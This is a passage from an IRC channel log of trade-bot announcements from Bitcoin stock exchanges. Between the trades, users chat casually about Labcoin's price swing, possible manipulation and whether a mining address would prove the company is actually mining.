[LABCOIN] 1 @ 0.002096 BTC [-] Sep 15 19:53:46 [BTCTC] [DMS.PURCHASE] 10 @ 0.009377 = 0.0938 BTC [-] Sep 15 19:55:15 [BTCTC] [LABCOIN] 3 @ 0.002073 = 0.0062 BTC [-] Sep 15 19:56:16 [BTCTC] [DMS.MINING] 31 @ 0.0025 = 0.0775 BTC [+] Sep 15 19:57:49 [BTCTC] [DMS.SELLING] 31 @ 0.007001 = 0.217 BTC [-] Sep 15 19:59:59 [BTCTC] [LABCOIN] 515 @ 0.002059 = 1.0604 BTC [-] Sep 15 20:00:00 [BTCTC] [LABCOIN] 485 @ 0.002061 = 0.9996 BTC [+] Sep 15 20:01:28 [BTCTC] [DMS.PURCHASE] 31 @ 0.009377 = 0.2907 BTC [-] Sep 15 20:01:31 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [-] Sep 15 20:01:41 [BTCTC] [LABCOIN] 444 @ 0.002059 = 0.9142 BTC [+] Sep 15 20:01:42 [BTCTC] [LABCOIN] 1 @ 0.00206 BTC [+] Sep 15 20:01:43 [BTCTC] [LABCOIN] 71 @ 0.002061 = 0.1463 BTC [+] Sep 15 20:01:45 [BTCTC] [LABCOIN] 4500 @ 0.002075 = 9.3375 BTC [+] Sep 15 20:01:46 [BTCTC] [LABCOIN] 96 @ 0.002078 = 0.1995 BTC [+] Sep 15 20:01:47 [BTCTC] [LABCOIN] 100 @ 0.002094 = 0.2094 BTC [+] Sep 15 20:01:48 [BTCTC] [LABCOIN] 1000 @ 0.002095 = 2.095 BTC [+] Sep 15 20:02:34 [BTCTC] [DMS.MINING] 7 @ 0.00259 = 0.0181 BTC [+] Sep 15 20:03:27 [MPEX] [S.MPOE] 6300 @ 0.00088577 = 5.5804 BTC [-] Sep 15 20:03:30 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00061 = 0.0012 BTC [-] Sep 15 20:10:19 [BTCTC] [DMS.PURCHASE] 10 @ 0.009377 = 0.0938 BTC [-] Sep 15 20:11:02 [BTCTC] [ASICMINER-PT] 2 @ 2.041 = 4.082 BTC [+] Sep 15 20:11:29 [BTCTC] [LABCOIN] 1 @ 0.0021 BTC [+] Sep 15 20:12:26 [BTCTC] [DMS.PURCHASE] 180 @ 0.009377 = 1.6879 BTC [-] Sep 15 20:13:04 [BTCTC] [DMS.MINING] 31 @ 0.00245 = 0.076 BTC [-] Sep 15 20:13:15 [BTCTC] [LABCOIN] 9 @ 0.0021 = 0.0189 BTC [+] Sep 15 20:21:09 [BTCTC] [ASICMINER-PT] 2 @ 2.107 = 4.214 BTC [+] Sep 15 20:21:40 [BTCTC] [LABCOIN] 7 @ 0.00215 = 0.0151 BTC [+] Sep 15 20:22:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.01965 = 0.1965 BTC [+] Sep 15 20:23:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.0196 = 0.294 BTC [-] Sep 15 20:23:56 [BTCTC] [LABCOIN] 13 @ 0.00215 = 0.028 BTC [+] Sep 15 20:23:57 [BTCTC] [LABCOIN] 354 @ 0.002183 = 0.7728 BTC [+] Sep 15 20:23:58 [BTCTC] [LABCOIN] 170 @ 0.002185 = 0.3715 BTC [+] Sep 15 20:24:00 [BTCTC] [LABCOIN] 1000 @ 0.002188 = 2.188 BTC [+] Sep 15 20:25:00 [BTCTC] [LABCOIN] 354 @ 0.002187 = 0.7742 BTC [-] Sep 15 20:25:00 [BTCTC] [LABCOIN] 150 @ 0.002189 = 0.3284 BTC [+] Sep 15 20:25:01 [BTCTC] [LABCOIN] 99 @ 0.00219 = 0.2168 BTC [+] Sep 15 20:25:03 [BTCTC] [LABCOIN] 10 @ 0.0022 = 0.022 BTC [+] Sep 15 20:25:04 [BTCTC] [LABCOIN] 10 @ 0.0022 = 0.022 BTC [+] Sep 15 20:25:05 [BTCTC] [LABCOIN] 99 @ 0.002207 = 0.2185 BTC [+] Sep 15 20:25:06 [BTCTC] [LABCOIN] 100 @ 0.00222 = 0.222 BTC [+] Sep 15 20:25:07 [BTCTC] [LABCOIN] 85 @ 0.002222 = 0.1889 BTC [+] Sep 15 20:25:08 [BTCTC] [LABCOIN] 493 @ 0.002222 = 1.0954 BTC [+] Sep 15 20:26:15 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [-] Sep 15 20:26:16 [BTCTC] [ASICMINER-PT] 2 @ 2.102 = 4.204 BTC [+] Sep 15 20:26:35 [BTCTC] [DMS.MINING] 1 @ 0.0025 BTC [+] Sep 15 20:27:07 [BTCTC] [DMS.MINING] 1 @ 0.00255 BTC [+] Sep 15 20:28:34 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 15 20:29:04 [BTCTC] [DMS.PURCHASE] 50 @ 0.0093 = 0.465 BTC [-] Sep 15 20:29:05 [BTCTC] [DMS.PURCHASE] 950 @ 0.009377 = 8.9082 BTC [+] Sep 15 20:29:20 [BTCTC] [LABCOIN] 305 @ 0.00222 = 0.6771 BTC [-] Sep 15 20:29:22 [BTCTC] [LABCOIN] 207 @ 0.002222 = 0.46 BTC [+] Sep 15 20:29:23 [BTCTC] [LABCOIN] 100 @ 0.002232 = 0.2232 BTC [+] Sep 15 20:29:24 [BTCTC] [LABCOIN] 100 @ 0.002232 = 0.2232 BTC [+] Sep 15 20:29:25 [BTCTC] [LABCOIN] 96 @ 0.002241 = 0.2151 BTC [+] Sep 15 20:29:26 [BTCTC] [LABCOIN] 1150 @ 0.00225 = 2.5875 BTC [+] Sep 15 20:29:26 [BTCTC] [LABCOIN] 500 @ 0.00225 = 1.125 BTC [+] Sep 15 20:29:27 [BTCTC] [LABCOIN] 700 @ 0.002258 = 1.5806 BTC [+] Sep 15 20:29:29 [BTCTC] [LABCOIN] 99 @ 0.002258 = 0.2235 BTC [+] Sep 15 20:29:30 [BTCTC] [LABCOIN] 6889 @ 0.002274 = 15.6656 BTC [+] Sep 15 20:30:23 [BTCTC] [LABCOIN] 158 @ 0.002252 = 0.3558 BTC [-] Sep 15 20:30:25 [BTCTC] [LABCOIN] 96 @ 0.002275 = 0.2184 BTC [+] Sep 15 20:30:26 [BTCTC] [LABCOIN] 8 @ 0.002288 = 0.0183 BTC [+] Sep 15 20:30:27 [BTCTC] [LABCOIN] 238 @ 0.002289 = 0.5448 BTC [+] Sep 15 20:30:41 [BTCTC] [LABCOIN] 84 @ 0.002271 = 0.1908 BTC [-] Sep 15 20:30:51 [BTCTC] [LABCOIN] 74 @ 0.002271 = 0.1681 BTC [-] Sep 15 20:31:02 [BTCTC] [LABCOIN] 84 @ 0.002271 = 0.1908 BTC [-] Sep 15 20:31:02 [BTCTC] [LABCOIN] 345 @ 0.002289 = 0.7897 BTC [+] Sep 15 20:31:27 [BTCTC] [LABCOIN] 86 @ 0.002292 = 0.1971 BTC [+] Sep 15 20:32:59 to teh moon! Sep 15 20:33:38 [BTCTC] [LABCOIN] 85 @ 0.002293 = 0.1949 BTC [+] Sep 15 20:36:29 [BTCTC] [LABCOIN] 1478 @ 0.002293 = 3.3891 BTC [+] Sep 15 20:38:35 [BTCTC] [LABCOIN] 1000 @ 0.002352 = 2.352 BTC [+] Sep 15 20:38:37 [BTCTC] [LABCOIN] 723 @ 0.002353 = 1.7012 BTC [+] Sep 15 20:38:38 [BTCTC] [LABCOIN] 305 @ 0.002354 = 0.718 BTC [+] Sep 15 20:38:39 [BTCTC] [LABCOIN] 210 @ 0.002356 = 0.4948 BTC [+] Sep 15 20:38:40 [BTCTC] [LABCOIN] 2000 @ 0.002357 = 4.714 BTC [+] Sep 15 20:38:41 [BTCTC] [LABCOIN] 300 @ 0.002358 = 0.7074 BTC [+] Sep 15 20:38:42 [BTCTC] [LABCOIN] 150 @ 0.002358 = 0.3537 BTC [+] Sep 15 20:38:44 [BTCTC] [LABCOIN] 1312 @ 0.002359 = 3.095 BTC [+] Sep 15 20:38:59 [BTCTC] [LABCOIN] 688 @ 0.002359 = 1.623 BTC [+] Sep 15 20:39:00 [BTCTC] [LABCOIN] 812 @ 0.00236 = 1.9163 BTC [+] Sep 15 20:39:10 [BTCTC] [LABCOIN] 1688 @ 0.00236 = 3.9837 BTC [+] Sep 15 20:39:11 [BTCTC] [LABCOIN] 95 @ 0.00236 = 0.2242 BTC [+] Sep 15 20:39:12 [BTCTC] [LABCOIN] 3447 @ 0.002361 = 8.1384 BTC [+] Sep 15 20:39:43 [BTCTC] [ASICMINER-PT] 1 @ 2.068 BTC [-] Sep 15 20:39:54 [BTCTC] [DMS.MINING] 344 @ 0.002424 = 0.8339 BTC [-] Sep 15 20:39:55 [BTCTC] [DMS.MINING] 1 @ 0.00242 BTC [-] Sep 15 20:39:57 [BTCTC] [DMS.MINING] 80 @ 0.00242 = 0.1936 BTC [-] Sep 15 20:39:58 [BTCTC] [DMS.MINING] 575 @ 0.00241 = 1.3858 BTC [-] Sep 15 20:41:12 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.000609 = 0.0024 BTC [-] Sep 15 20:41:49 [BTCTC] [LABCOIN] 1000 @ 0.002362 = 2.362 BTC [+] Sep 15 20:41:51 [BTCTC] [LABCOIN] 250 @ 0.002363 = 0.5908 BTC [+] Sep 15 20:41:52 [BTCTC] [LABCOIN] 1000 @ 0.002363 = 2.363 BTC [+] Sep 15 20:41:53 [BTCTC] [LABCOIN] 97 @ 0.002378 = 0.2307 BTC [+] Sep 15 20:41:54 [BTCTC] [LABCOIN] 600 @ 0.002391 = 1.4346 BTC [+] Sep 15 20:41:55 [BTCTC] [LABCOIN] 2000 @ 0.002392 = 4.784 BTC [+] Sep 15 20:41:56 [BTCTC] [LABCOIN] 1000 @ 0.002399 = 2.399 BTC [+] Sep 15 20:41:57 [BTCTC] [LABCOIN] 158 @ 0.002399 = 0.379 BTC [+] Sep 15 20:41:59 [BTCTC] [LABCOIN] 479 @ 0.0024 = 1.1496 BTC [+] Sep 15 20:42:00 [BTCTC] [LABCOIN] 950 @ 0.0024 = 2.28 BTC [+] Sep 15 20:42:01 [BTCTC] [LABCOIN] 3000 @ 0.0024 = 7.2 BTC [+] Sep 15 20:42:01 [BTCTC] [LABCOIN] 2000 @ 0.00244 = 4.88 BTC [+] Sep 15 20:42:02 [BTCTC] [LABCOIN] 60 @ 0.002444 = 0.1466 BTC [+] Sep 15 20:42:03 [BTCTC] [LABCOIN] 1013 @ 0.002448 = 2.4798 BTC [+] Sep 15 20:42:04 [BTCTC] [LABCOIN] 2000 @ 0.002449 = 4.898 BTC [+] Sep 15 20:42:05 [BTCTC] [LABCOIN] 1500 @ 0.00245 = 3.675 BTC [+] Sep 15 20:42:06 [BTCTC] [LABCOIN] 78 @ 0.002476 = 0.1931 BTC [+] Sep 15 20:42:07 [BTCTC] [LABCOIN] 3000 @ 0.002476 = 7.428 BTC [+] Sep 15 20:42:08 [BTCTC] [LABCOIN] 114 @ 0.00248 = 0.2827 BTC [+] Sep 15 20:42:09 [BTCTC] [LABCOIN] 3730 @ 0.00248 = 9.2504 BTC [+] Sep 15 20:42:10 [BTCTC] [LABCOIN] 5000 @ 0.002481 = 12.405 BTC [+] Sep 15 20:42:10 [BTCTC] [LABCOIN] 462 @ 0.002499 = 1.1545 BTC [+] Sep 15 20:42:11 [BTCTC] [LABCOIN] 500 @ 0.0025 = 1.25 BTC [+] Sep 15 20:42:12 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [+] Sep 15 20:42:13 [BTCTC] [LABCOIN] 100 @ 0.0025 = 0.25 BTC [+] Sep 15 20:42:14 [BTCTC] [LABCOIN] 200 @ 0.0025 = 0.5 BTC [+] Sep 15 20:42:15 [BTCTC] [LABCOIN] 10 @ 0.0025 = 0.025 BTC [+] Sep 15 20:42:16 [BTCTC] [LABCOIN] 1064 @ 0.0025 = 2.66 BTC [+] Sep 15 20:42:17 [BTCTC] [DMS.SELLING] 369 @ 0.007001 = 2.5834 BTC [-] Sep 15 20:42:18 [BTCTC] [DMS.SELLING] 1000 @ 0.007 = 7 BTC [-] Sep 15 20:42:20 [BTCTC] [LABCOIN] 50 @ 0.002389 = 0.1195 BTC [-] Sep 15 20:42:26 [BTCTC] [LABCOIN] 950 @ 0.002389 = 2.2696 BTC [-] Sep 15 20:42:26 [BTCTC] [LABCOIN] 1000 @ 0.00239 = 2.39 BTC [+] Sep 15 20:42:44 [BTCTC] [MININGCO.ETF] 10 @ 0.09999 = 0.9999 BTC [+] Sep 15 20:42:56 [BTCTC] [LABCOIN] 200 @ 0.002542 = 0.5084 BTC [+] Sep 15 20:42:57 [BTCTC] [LABCOIN] 565 @ 0.002543 = 1.4368 BTC [+] Sep 15 20:42:58 [BTCTC] [LABCOIN] 1485 @ 0.002558 = 3.7986 BTC [+] Sep 15 20:43:18 [BTCTC] [DMS.PURCHASE] 3 @ 0.009377 = 0.0281 BTC [+] Sep 15 20:45:56 til : it can snow in buenos aires. Sep 15 20:46:23 [BTCTC] [RSM] 5 @ 0.00863 = 0.0432 BTC [+] Sep 15 20:48:18 haha that must be odd for most, i guess that's one of the first times? Sep 15 20:48:43 woah yep. first time since 90 years.. Sep 15 20:49:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.009377 BTC [+] Sep 15 20:49:51 [BTCTC] [COGNITIVE] 5 @ 0.17 = 0.85 BTC [-] Sep 15 20:50:40 [BTCTC] [NASTY-PT] 2 @ 0.001856 = 0.0037 BTC [+] Sep 15 20:50:47 yeah. Sep 15 20:50:51 [BTCTC] [LABCOIN] 4 @ 0.002405 = 0.0096 BTC [-] Sep 15 20:50:52 [BTCTC] [LABCOIN] 9 @ 0.00247 = 0.0222 BTC [+] Sep 15 20:51:17 [BTCTC] [LABCOIN] 20 @ 0.0025 = 0.05 BTC [+] Sep 15 20:51:29 [BTCTC] [LABCOIN] 8 @ 0.002556 = 0.0204 BTC [+] Sep 15 20:51:30 [BTCTC] [LABCOIN] 1492 @ 0.002557 = 3.815 BTC [+] Sep 15 20:51:53 [BTCTC] [LABCOIN] 608 @ 0.002557 = 1.5547 BTC [+] Sep 15 20:51:54 [BTCTC] [LABCOIN] 515 @ 0.002558 = 1.3174 BTC [+] Sep 15 20:51:56 [BTCTC] [LABCOIN] 2354 @ 0.002558 = 6.0215 BTC [+] Sep 15 20:51:57 [BTCTC] [LABCOIN] 100 @ 0.00256 = 0.256 BTC [+] Sep 15 20:51:58 [BTCTC] [LABCOIN] 600 @ 0.002573 = 1.5438 BTC [+] Sep 15 20:51:59 [BTCTC] [LABCOIN] 548 @ 0.002598 = 1.4237 BTC [+] Sep 15 20:52:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.009377 BTC [+] Sep 15 20:52:41 [BTCTC] [LABCOIN] 600 @ 0.002598 = 1.5588 BTC [+] Sep 15 20:52:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.01995 BTC [+] Sep 15 20:53:12 [BTCTC] [LABCOIN] 1000 @ 0.002598 = 2.598 BTC [+] Sep 15 20:53:36 [BTCTC] [DMS.PURCHASE] 1 @ 0.009377 BTC [+] Sep 15 20:53:53 [BTCTC] [ASICMINER-PT] 1 @ 2.042 BTC [-] Sep 15 20:53:54 [BTCTC] [ASICMINER-PT] 2 @ 2.041 = 4.082 BTC [-] Sep 15 20:53:56 [BTCTC] [LABCOIN] 800 @ 0.002598 = 2.0784 BTC [+] Sep 15 20:53:57 [BTCTC] [ASICMINER-PT] 9 @ 2.04 = 18.36 BTC [-] Sep 15 20:54:05 [BTCTC] [LABCOIN] 1 @ 0.0026 BTC [+] Sep 15 20:54:06 [BTCTC] [LABCOIN] 29 @ 0.0026 = 0.0754 BTC [+] Sep 15 20:54:07 where is my cookie for calling the reversal? ;) Sep 15 20:54:08 [BTCTC] [LABCOIN] 50 @ 0.002598 = 0.1299 BTC [-] Sep 15 20:54:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.01995 = 0.1995 BTC [+] Sep 15 20:54:33 [BTCTC] [DMS.MINING] 3 @ 0.002415 = 0.0072 BTC [+] Sep 15 20:54:34 [BTCTC] [DMS.MINING] 5 @ 0.002415 = 0.0121 BTC [+] Sep 15 20:54:39 [BTCTC] [DMS.MINING] 104 @ 0.002415 = 0.2512 BTC [+] Sep 15 20:54:42 [BTCTC] [TAT.MINIGAME] 2 @ 0.000234 = 0.0005 BTC [+] Sep 15 20:54:56 [BTCTC] [KENILWORTH] 1 @ 0.0017 BTC [-] Sep 15 20:54:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.01996 = 0.1996 BTC [+] Sep 15 20:55:05 ;;echo here's your cookie dexX7 Sep 15 20:55:06 here's your cookie dexX7 Sep 15 20:55:12 [BTCTC] [LABCOIN] 33 @ 0.002598 = 0.0857 BTC [-] Sep 15 20:55:20 ty :> Sep 15 20:55:27 [BTCTC] [LABCOIN] 2323 @ 0.002598 = 6.0352 BTC [-] Sep 15 20:55:28 [BTCTC] [LABCOIN] 71 @ 0.0026 = 0.1846 BTC [+] Sep 15 20:55:29 [BTCTC] [LABCOIN] 20 @ 0.0026 = 0.052 BTC [+] Sep 15 20:55:30 Whats the reason as of now? Just woke up a bit ago Sep 15 20:55:30 [BTCTC] [LABCOIN] 2354 @ 0.0026 = 6.1204 BTC [+] Sep 15 20:55:31 [BTCTC] [LABCOIN] 5478 @ 0.0026 = 14.2428 BTC [+] Sep 15 20:55:32 [BTCTC] [LABCOIN] 1000 @ 0.002622 = 2.622 BTC [+] Sep 15 20:55:33 [BTCTC] [LABCOIN] 1000 @ 0.002623 = 2.623 BTC [+] Sep 15 20:55:34 [BTCTC] [LABCOIN] 2354 @ 0.002624 = 6.1769 BTC [+] Sep 15 20:55:35 [BTCTC] [LABCOIN] 1000 @ 0.002625 = 2.625 BTC [+] Sep 15 20:55:36 [BTCTC] [LABCOIN] 1000 @ 0.00265 = 2.65 BTC [+] Sep 15 20:55:37 [BTCTC] [LABCOIN] 121 @ 0.002651 = 0.3208 BTC [+] Sep 15 20:55:38 [BTCTC] [LABCOIN] 6521 @ 0.002697 = 17.5871 BTC [+] Sep 15 20:55:39 [BTCTC] [LABCOIN] 3000 @ 0.002698 = 8.094 BTC [+] Sep 15 20:55:39 [BTCTC] [LABCOIN] 4158 @ 0.002699 = 11.2224 BTC [+] Sep 15 20:55:40 [BTCTC] [LABCOIN] 1000 @ 0.0027 = 2.7 BTC [+] Sep 15 20:55:41 [BTCTC] [LABCOIN] 100 @ 0.0027 = 0.27 BTC [+] Sep 15 20:55:42 [BTCTC] [LABCOIN] 2000 @ 0.0027 = 5.4 BTC [+] Sep 15 20:55:43 [BTCTC] [LABCOIN] 50 @ 0.00273 = 0.1365 BTC [+] Sep 15 20:55:43 or just a moentum swing? Sep 15 20:55:44 [BTCTC] [LABCOIN] 400 @ 0.00274 = 1.096 BTC [+] Sep 15 20:55:45 no-news-update but "we will publish the mining address on wed" Sep 15 20:55:45 [BTCTC] [LABCOIN] 2000 @ 0.002749 = 5.498 BTC [+] Sep 15 20:55:46 [BTCTC] [LABCOIN] 1250 @ 0.002578 = 3.2225 BTC [-] Sep 15 20:55:47 [BTCTC] [LABCOIN] 364 @ 0.00275 = 1.001 BTC [+] Sep 15 20:55:48 [BTCTC] [LABCOIN] 5436 @ 0.00275 = 14.949 BTC [+] Sep 15 20:55:54 Wow.... Sep 15 20:55:59 it's crazy Sep 15 20:56:08 [BTCTC] [TAT.ASICMINER] 33 @ 0.02004 = 0.6613 BTC [+] Sep 15 20:56:16 i <3 labcoin Sep 15 20:56:25 [BTCTC] [TAT.ASICMINER] 9 @ 0.02004 = 0.1804 BTC [+] Sep 15 20:56:41 the most entertaining stock Sep 15 20:56:52 [BTCTC] [LABCOIN] 800 @ 0.00275 = 2.2 BTC [+] Sep 15 20:57:05 [BTCTC] [DMS.PURCHASE] 2 @ 0.009377 = 0.0188 BTC [+] Sep 15 20:57:10 What good is a mining address? You cant point bare chips and boards to an address :p Sep 15 20:57:18 [BTCTC] [LABCOIN] 68 @ 0.00275 = 0.187 BTC [+] Sep 15 20:57:26 it'll prove they have something that's mining Sep 15 20:57:29 [BTCTC] [DMS.PURCHASE] 143 @ 0.009377 = 1.3409 BTC [+] Sep 15 20:57:31 [BTCTC] [LABCOIN] 750 @ 0.00275 = 2.0625 BTC [+] Sep 15 20:57:35 [BTCTC] [TAT.ASICMINER] 17 @ 0.02004 = 0.3407 BTC [+] Sep 15 20:57:49 Sweet an USB eruptor? Sep 15 20:58:11 it won't prove what they have mining, just that they are :P Sep 15 20:58:11 [BTCTC] [ACTIVEMINING] 2 @ 0.002689 = 0.0054 BTC [+] Sep 15 20:58:24 [BTCTC] [LABCOIN] 75 @ 0.002749 = 0.2062 BTC [-] Sep 15 20:58:58 Good ole labcoin, always good for a laugh Sep 15 20:59:09 seriously Sep 15 20:59:19 [BTCTC] [LABCOIN] 1472 @ 0.002749 = 4.0465 BTC [-] Sep 15 20:59:20 [BTCTC] [LABCOIN] 946 @ 0.00275 = 2.6015 BTC [+] Sep 15 20:59:21 [BTCTC] [LABCOIN] 20 @ 0.00275 = 0.055 BTC [+] Sep 15 20:59:22 [BTCTC] [LABCOIN] 1456 @ 0.002777 = 4.0433 BTC [+] Sep 15 20:59:23 [BTCTC] [LABCOIN] 2200 @ 0.002789 = 6.1358 BTC [+] Sep 15 20:59:24 [BTCTC] [LABCOIN] 2000 @ 0.00279 = 5.58 BTC [+] Sep 15 20:59:25 [BTCTC] [LABCOIN] 1100 @ 0.0028 = 3.08 BTC [+] Sep 15 20:59:26 [BTCTC] [LABCOIN] 10 @ 0.0028 = 0.028 BTC [+] Sep 15 20:59:27 [BTCTC] [LABCOIN] 30 @ 0.0028 = 0.084 BTC [+] Sep 15 20:59:28 [BTCTC] [LABCOIN] 5766 @ 0.0028 = 16.1448 BTC [+] Sep 15 20:59:33 [BTCTC] [NASTY-PT] 1 @ 0.001856 BTC [+] Sep 15 21:00:21 [BTCTC] [DMS.PURCHASE] 16 @ 0.009377 = 0.15 BTC [+] Sep 15 21:00:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000609 BTC [-] Sep 15 21:01:14 due to the volume and constant high volatility it's a dream to trade, but the recent sell-off made me almost crazy, not because i lost (i didn't), but i fear i start to see things, that aren't not necessarily there (i.e. "it's coordinated manipulation") etc. and this makes it way more unpredictable, at least for me Sep 15 21:01:40 no, they're there. Sep 15 21:01:48 [BTCTC] [CIPHERMINE.B1] 65 @ 0.01039 = 0.6754 BTC [-] Sep 15 21:02:01 yes, i think so too Sep 15 21:04:08 [BTCTC] [LABCOIN] 16 @ 0.002627 = 0.042 BTC [-] Sep 15 21:04:10 [BTCTC] [LABCOIN] 16 @ 0.002634 = 0.0421 BTC [+] Sep 15 21:04:11 Or does it become even more predictable? Sep 15 21:04:11 [BTCTC] [LABCOIN] 234 @ 0.0028 = 0.6552 BTC [+] Sep 15 21:04:12 [BTCTC] [LABCOIN] 50 @ 0.002811 = 0.1406 BTC [+] Sep 15 21:04:13 [BTCTC] [LABCOIN] 535 @ 0.002826 = 1.5119 BTC [+] Sep 15 21:04:14 [BTCTC] [LABCOIN] 5000 @ 0.00285 = 14.25 BTC [+] Sep 15 21:04:15 [BTCTC] [LABCOIN] 200 @ 0.002888 = 0.5776 BTC [+] Sep 15 21:04:16 [BTCTC] [LABCOIN] 2129 @ 0.002888 = 6.1486 BTC [+] Sep 15 21:04:43 [BTCTC] [DMS.MINING] 272 @ 0.002419 = 0.658 BTC [+] Sep 15 21:04:55 I would make your btc then step back for a day Sep 15 21:05:00 [BTCTC] [DMS.MINING] 9 @ 0.002416 = 0.0217 BTC [-] Sep 15 21:05:02 [BTCTC] [DMS.MINING] 590 @ 0.002415 = 1.4249 BTC [-] Sep 15 21:05:04 [MPEX] [S.MPOE] 11073 @ 0.00088577 = 9.8081 BTC [-] Sep 15 21:05:29 [BTCTC] [LABCOIN] 16 @ 0.002888 = 0.0462 BTC [+] Sep 15 21:05:32 I dont expect this pump to end well Sep 15 21:05:40 that's the thing though, which swing will leave the price permanently higher, or permanently lower Sep 15 21:05:52 If I had bought some before bed last night Id be happier today tho Sep 15 21:05:58 you have a point. i usually say "if you spot manipulation, be happy about it and adjust" Sep 15 21:06:22 [BTCTC] [DMS.MINING] 1 @ 0.002415 BTC [-] Sep 15 21:06:31 but it needs more care and attention Sep 15 21:06:51 a mining address that can prove at least 1.5th will have the stock price back to 4 in no time Sep 15 21:06:56 [BTCTC] [LABCOIN] 15 @ 0.0028 = 0.042 BTC [-] Sep 15 21:06:57 [BTCTC] [LABCOIN] 15 @ 0.002751 = 0.0413 BTC [-] Sep 15 21:07:09 [BTCTC] [DMS.PURCHASE] 9 @ 0.009377 = 0.0844 BTC [+] Sep 15 21:07:22 [BTCTC] [LABCOIN] 52 @ 0.00275 = 0.143 BTC [-] Sep 15 21:07:24 https://bitcointalk.org/index.php?topic=263445.msg3160405#msg3160405 Sep 15 21:07:32 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 15 21:07:37 What it needs are assembled, functioning boards. Provided with care and attention :) Sep 15 21:07:47 oh i agree Sep 15 21:07:59 hehe yes Sep 15 21:08:00 [BTCTC] [LTC-ATF.B2] 1 @ 0.01089 BTC [+] Sep 15 21:08:27 [BTCTC] [DMS.MINING] 7 @ 0.002525 = 0.0177 BTC [+] Sep 15 21:08:37 [BTCTC] [LABCOIN] 12 @ 0.002749 = 0.033 BTC [-] Sep 15 21:08:39 [BTCTC] [LABCOIN] 18 @ 0.00275 = 0.0495 BTC [+] Sep 15 21:09:01 blockchain uses utc as time, does anyone know? Sep 15 21:09:24 well nevermind Sep 15 21:09:55 [HAVELOCK] [LABCO] 47 @ 0.002279 = 0.1071 BTC [-] Sep 15 21:10:15 [HAVELOCK] [LABCO] 195 @ 0.00228 = 0.4446 BTC [+] Sep 15 21:11:31 it does yes Sep 15 21:12:16 [BTCTC] [LABCOIN] 3 @ 0.002847 = 0.0085 BTC [+] Sep 15 21:12:17 [BTCTC] [LABCOIN] 15 @ 0.002848 = 0.0427 BTC [+] Sep 15 21:12:19 [BTCTC] [LABCOIN] 200 @ 0.002848 = 0.5696 BTC [+] Sep 15 21:12:20 [BTCTC] [LABCOIN] 282 @ 0.002897 = 0.817 BTC [+] Sep 15 21:12:57 it would be a somewhat stronger soft-argument, if the last found block was found only a few minutes before their announcement, but that's not the case Sep 15 21:13:08 [BTCTC] [LABCOIN] 1718 @ 0.002897 = 4.977 BTC [+] Sep 15 21:14:00 Could they have found the block, and there been a delay in broadcasting the block/reward on the blockchain? Sep 15 21:14:34 [BTCTC] [DMS.PURCHASE] 23 @ 0.009377 = 0.2157 BTC [+] Sep 15 21:14:52 i don't think so. if you delay the broadcast, you run into the risk that another miner publishes the next block Sep 15 21:15:46 [BTCTC] [DMS.PURCHASE] 2 @ 0.009377 = 0.0188 BTC [+] Sep 15 21:16:03 [BTCTC] [COGNITIVE] 1 @ 0.228 BTC [+] Sep 15 21:16:04 [BTCTC] [COGNITIVE] 3 @ 0.228 = 0.684 BTC [+] Sep 15 21:16:05 it is risky to withhold blocks Sep 15 21:16:09 but that doesn't make it impossible. Sep 15 21:16:26 [BTCTC] [LABCOIN] 200 @ 0.0029 = 0.58 BTC [+] Sep 15 21:16:26 [BTCTC] [LABCOIN] 740 @ 0.0029 = 2.146 BTC [+] Sep 15 21:16:28 [BTCTC] [LABCOIN] 1 @ 0.0029 BTC [+] Sep 15 21:16:29 [BTCTC] [LABCOIN] 1999 @ 0.0029 = 5.7971 BTC [+] Sep 15 21:16:30 [BTCTC] [LABCOIN] 2060 @ 0.002908 = 5.9905 BTC [+] Sep 15 21:16:38 [BTCTC] [COGNITIVE] 1 @ 0.2281 BTC [+] Sep 15 21:16:42 (risk can be mitigated a lot if you have a very well connected node, by blasrting your withheld block just as soon as anyone relays a competitor. Sep 15 21:16:52 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Sep 15 21:16:52 you would actually to do this, if attempt to double spend Sep 15 21:16:59 yes. Sep 15 21:17:04 *want to do Sep 15 21:17:14 [BTCTC] [LABCOIN] 1 @ 0.0027 BTC [-] Sep 15 21:17:17 [BTCTC] [LABCOIN] 1054 @ 0.0027 = 2.8458 BTC [-] Sep 15 21:17:29 [BTCTC] [LABCOIN] 1054 @ 0.0027 = 2.8458 BTC [-] Sep 15 21:17:39 [BTCTC] [LABCOIN] 2891 @ 0.0027 = 7.8057 BTC [-] Sep 15 21:18:09 [BTCTC] [LABCOIN] 1054 @ 0.002908 = 3.065 BTC [+] Sep 15 21:18:38 [BTCTC] [LABCOIN] 3500 @ 0.002977 = 10.4195 BTC [+] Sep 15 21:18:45 [HAVELOCK] [DEALCO] 1 @ 0.0085 BTC [+] Sep 15 21:18:52 [BTCTC] [ACTIVEMINING] 700 @ 0.00263 = 1.841 BTC [-] Sep 15 21:19:27 i wonder what kind of trollnouncement they're going to make the next time they want to pick up more cheap LC shares Sep 15 21:19:31 [BTCTC] [ASICMINER-PT] 1 @ 2.032 BTC [-] Sep 15 21:19:32 [BTCTC] [ASICMINER-PT] 1 @ 2.031 BTC [-] Sep 15 21:19:34 [BTCTC] [ASICMINER-PT] 7 @ 2.03 = 14.21 BTC [-] Sep 15 21:19:35 [BTCTC] [ASICMINER-PT] 1 @ 2.024 BTC [-] Sep 15 21:19:37 [BTCTC] [LABCOIN] 350 @ 0.002977 = 1.042 BTC [+] Sep 15 21:19:39 [BTCTC] [LABCOIN] 150 @ 0.002977 = 0.4466 BTC [+] Sep 15 21:19:41 [BTCTC] [LABCOIN] 46 @ 0.002977 = 0.1369 BTC [+] Sep 15 21:19:45 Interesting, nothing solid, and hardly provable I imagine. Some coincidences are too timely to ignore - of course we are referring to luck in the grand scheme of bitcoin mining Sep 15 